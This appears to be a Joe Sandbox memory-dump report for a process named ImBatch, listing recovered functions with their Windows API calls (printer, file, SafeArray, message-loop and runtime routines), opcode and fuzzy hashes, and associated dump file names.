Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
String ID: en-US,en,
API String ID: 1058953229-3579323720
Opcode ID: 8efda76973df8a26bb3be9b9a1e93f206cb0392114a0b372c7f8751a7b064e7a
Instruction ID: 82c958a7823d20182cf09a098f1a0081edfb2a8e9f4fff8949267023173d2468
Opcode Fuzzy Hash: 8efda76973df8a26bb3be9b9a1e93f206cb0392114a0b372c7f8751a7b064e7a
Instruction Fuzzy Hash: 8521B42C70C61467DB24F7BCCC62A6D3799EB44600F614C26F8C09729CDEA5AD80D3B5

Uniqueness

Uniqueness Score: -1.00%

Function 108715C8 Relevance: 16.7, APIs: 11, Instructions: 196memoryCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(?,00000000,108717D4,?,?,00000000,00000000), ref: 10871607
GlobalFree.KERNEL32 ref: 10871610
GlobalLock.KERNEL32 ref: 10871625
ClosePrinter.WINSPOOL.DRV(?,00000000,108717D4,?,?,00000000,00000000), ref: 10871648
OpenPrinterW.WINSPOOL.DRV(?,00000024,00000000,?,?,00000000,00000000), ref: 10871733
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,?,?,?,?,00000024,00000000,?,?), ref: 10871752
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,?,?,?,?,00000024,00000000), ref: 1087175A
GlobalLock.KERNEL32 ref: 10871769
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,00000000,00000042,00000000,00000000,?,?,00000000,00000000,00000000), ref: 10871781
GlobalUnlock.KERNEL32(?,00000000,?,?,00000000,00000000,00000002,00000000,00000042,00000000,00000000,?,?,00000000,00000000,00000000), ref: 1087178E
GlobalFree.KERNEL32 ref: 10871797

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Global$DocumentFreeLockPropertiesUnlock$AllocCloseOpenPrinterPrinter.
String ID:
API String ID: 4137974848-0
Opcode ID: 196824af6bc04043890fd851751eb89d025ad78004b62e639f7777a5678c1573
Instruction ID: 9ebb78b87988d9e01c8ca01f781460023b3b148b1f58622511c1375857600b52
Opcode Fuzzy Hash: 196824af6bc04043890fd851751eb89d025ad78004b62e639f7777a5678c1573
Instruction Fuzzy Hash: 03711CB9A042049FCB44DFADC881A9E77F9EF48350F218665F908EB759DA30ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BC91C70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6BC91C9B
___except_validate_context_record.LIBVCRUNTIME ref: 6BC91CA3
_ValidateLocalCookies.LIBCMT ref: 6BC91D31
__IsNonwritableInCurrentImage.LIBCMT ref: 6BC91D5C
_ValidateLocalCookies.LIBCMT ref: 6BC91DB1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6BC91DCC
___vcrt_initialize_locks.LIBVCRUNTIME ref: 6BC91DD1
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6BC91DE6

Strings

csm, xrefs: 6BC91D46

Memory Dump Source

Source File: 00000003.00000002.457242916.000000006BC64000.00000080.00000001.01000000.0000000C.sdmp, Offset: 6BC60000, based on PE: true

Associated: 00000003.00000002.457219059.000000006BC60000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.457229439.000000006BC61000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BE4E000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF0A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF18000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF1A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF28000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF71000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF8D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BF9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000003.00000002.458354116.000000006BFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bc60000_ImBatch.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID: csm
API String ID: 3202733602-1018135373
Opcode ID: abcb0e6375aedf6070957485865bb0694255dcbea9a8e1cc6483bd3b9cb682f2
Instruction ID: c35e776da28403dd2bfd66eb5a148b91fb6a22aef53801c36824388067bb7b99
Opcode Fuzzy Hash: abcb0e6375aedf6070957485865bb0694255dcbea9a8e1cc6483bd3b9cb682f2
Instruction Fuzzy Hash: BC412836E20228BBEF11EF7DE84269E7BB8BF01718F108195D8245B251E739DB11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10804940 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 108049C9
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 108049ED
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10804A09
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 10804A2A
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 10804A53
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 10804A61
GetStdHandle.KERNEL32(000000F5), ref: 10804A9C
GetFileType.KERNEL32(?,000000F5), ref: 10804AB2
CloseHandle.KERNEL32(?,?,000000F5), ref: 10804ACD
GetLastError.KERNEL32(000000F5), ref: 10804AE5

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 7cb179c4b606925a0b9b23c843ac7e47c982582d1e29280489cdcf71e64fc4ed
Instruction ID: 69d51b986404ba268fb69ac36c66f67f4d8b6cf2a1bf55656e913fd844aa26b0
Opcode Fuzzy Hash: 7cb179c4b606925a0b9b23c843ac7e47c982582d1e29280489cdcf71e64fc4ed
Instruction Fuzzy Hash: B14192F46CCB619DE7609F6C8C0171376A4EB40750F20AE2DE197865ECDEB6AC508748

Uniqueness

Uniqueness Score: -1.00%

Function 1082270C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 108227A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 108227C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 108227FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 10822877
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 10822890
VariantCopy.OLEAUT32(?), ref: 108228C5

Strings

, xrefs: 10822726

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: fc5b3d54f5321c426c40c79f22d40dee555053553ded3789347db1ef948073d8
Instruction ID: 1a86e62b6e5292f6bbf4a4e3a6a90b7c9c5c79884792b1dcf3fe64102c7bcf38
Opcode Fuzzy Hash: fc5b3d54f5321c426c40c79f22d40dee555053553ded3789347db1ef948073d8
Instruction Fuzzy Hash: 1F51E875A04629AFCB62DB58DC80AD9B3BCEB0C210F8041E5E948E7211DA30AFC1CF65

Uniqueness

Uniqueness Score: -1.00%

Function 1080663C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?,?), ref: 10806675
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?,?,00000001,108067E2,108043B7,108043FE,?), ref: 1080667B
GetStdHandle.KERNEL32(000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806690
WriteFile.KERNEL32(00000000,000000F5,108066C8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,108066ED,?,?), ref: 10806696
MessageBoxA.USER32 ref: 108066B4

Strings

Error, xrefs: 108066A8
Runtime error at 00000000, xrefs: 1080666E, 108066AD

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: a1d8641f8444099011d4ec898e55fe1507a8dedcc21004c6644f616b725e9538
Instruction ID: 0eed7b0a0340f11d25baadcd7dfc568ee030408d5255cbf261008060ce9639d4
Opcode Fuzzy Hash: a1d8641f8444099011d4ec898e55fe1507a8dedcc21004c6644f616b725e9538
Instruction Fuzzy Hash: 5FF0246661C35079F714F3AC8D82F8B266CD749F25FE0860AF230AC0ECCBA124C58626

Uniqueness

Uniqueness Score: -1.00%

Function 10803120 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 108031B6
Sleep.KERNEL32(0000000A,00000000,?), ref: 108031D0

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 18dc6203709990107c4bebac2ff118d7ad5e0e2f02596dc81b4342e17a897bef
Instruction ID: 5c9e389f629c43b35fd3310942321fb38746bc95e44b522ac492eb9ec3ffbec9
Opcode Fuzzy Hash: 18dc6203709990107c4bebac2ff118d7ad5e0e2f02596dc81b4342e17a897bef
Instruction Fuzzy Hash: 6471B1716193509FE315CF68CD85B07BBD8EF8A350F14C2AEE8548B299DAB0D845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 108A18B0 Relevance: 12.1, APIs: 8, Instructions: 118windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 108A18CC
PeekMessageW.USER32 ref: 108A18E4
IsWindowUnicode.USER32 ref: 108A18F8
PeekMessageW.USER32 ref: 108A191F
PeekMessageA.USER32 ref: 108A1935
TranslateMessage.USER32 ref: 108A19C0
DispatchMessageW.USER32 ref: 108A19CD
DispatchMessageA.USER32 ref: 108A19D5

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: fc569cfff570b2fcb49678c697a11d9881c910fd929807cc50134fe5c63e36e9
Instruction ID: 50a17ffb21b147e37bba23cc7ae08489c994d16b9ff116f12de2500163b9773a
Opcode Fuzzy Hash: fc569cfff570b2fcb49678c697a11d9881c910fd929807cc50134fe5c63e36e9
Instruction Fuzzy Hash: F231F52474C381B6FF112A288C53FEF5E88CF826C4F6C4015F5C0975C1D7E9A946C2AA

Uniqueness

Uniqueness Score: -1.00%

Function 108A1664 Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 108A168A
IsWindowUnicode.USER32(00000000), ref: 108A16CD
SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 108A16E8
SendMessageA.USER32 ref: 108A1707
GetWindowThreadProcessId.USER32(00000000), ref: 108A1716
GetWindowThreadProcessId.USER32(?,?), ref: 108A1727
SendMessageW.USER32(00000000,-0000BBEE,00000000,?), ref: 108A1747

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: f8964b70b25ac501cde0945e41e80e185d3b925f0eeb38451f24579a25b86a3b
Instruction ID: d9378419e8c15252e4006c6ccf76dbe7b43cd209c2a82782ca347ee581244501
Opcode Fuzzy Hash: f8964b70b25ac501cde0945e41e80e185d3b925f0eeb38451f24579a25b86a3b
Instruction Fuzzy Hash: CF21397920C209EFAB50EA6CCD80F5BB3DCEF192A0B155828F999C7A45DB61FC00C760

Uniqueness

Uniqueness Score: -1.00%

Function 10803318 Relevance: 10.9, APIs: 7, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7772f4fa52a6ab525392ccfc92f5523f7999c5d5fe4618791ff34e80c61899f
Instruction ID: 4c6f71afee05f28bbbb0943ccf336698ba0cfdb42e6f896d749802de9191d889
Opcode Fuzzy Hash: c7772f4fa52a6ab525392ccfc92f5523f7999c5d5fe4618791ff34e80c61899f
Instruction Fuzzy Hash: C6C12376B186050BE7059A7C9CC576FB789EBC4260F18C23AF614CB39DEAA4DC468380

Uniqueness

Uniqueness Score: -1.00%

Function 10A72F94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 10A72FBE
RegisterClassW.USER32 ref: 10A72FE2
